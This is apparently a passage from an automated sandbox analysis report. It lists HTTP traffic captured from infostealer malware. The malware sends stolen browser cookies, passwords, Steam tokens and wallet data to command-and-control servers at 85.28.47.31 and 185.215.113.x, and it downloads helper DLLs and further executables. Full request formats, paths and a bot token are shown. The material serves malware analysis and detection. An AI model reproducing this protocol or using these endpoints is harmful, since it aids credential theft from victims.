2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGDHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="file"------FHCGCFHDHIIIDGCAAEGD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEHHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 2d 2d 0d 0a Data Ascii: ------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="file"------AFIIIIJKFCAAECAKFIEH--
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJEBKECBAKFBGDGCBGDHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKKFBFIDGDBFHJJEHIHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 2d 2d 0d 0a Data Ascii: ------CAKKKFBFIDGDBFHJJEHIContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------CAKKKFBFIDGDBFHJJEHIContent-Disposition: form-data; name="message"wallets------CAKKKFBFIDGDBFHJJEHI--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDBKJKFIECAAAKFBFBHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 44 42 4b 4a 4b 46 49 45 43 41 41 41 4b 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 42 4b 4a 4b 46 49 45 43 41 41 41 4b 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 42 4b 4a 4b 46 49 45 43 41 41 41 4b 46 42 46 42 2d 2d 0d 0a Data Ascii: ------FHJDBKJKFIECAAAKFBFBContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------FHJDBKJKFIECAAAKFBFBContent-Disposition: form-data; name="message"ybncbhylepme------FHJDBKJKFIECAAAKFBFB--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="file"------IIDHJKFBGIIJJKFIJDBG--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="message"files------DHIDHIEGIIIECAKEBFBA--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIEHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 2d 2d 0d 0a Data Ascii: ------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JEBGCBAFCGDAAKFIDGIE--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000016001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 41 41 32 45 43 42 43 45 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="hwid"25AA2ECBCE684217651120------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="build"sila------DGHIDAFCGIEHIEBFCFBA--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
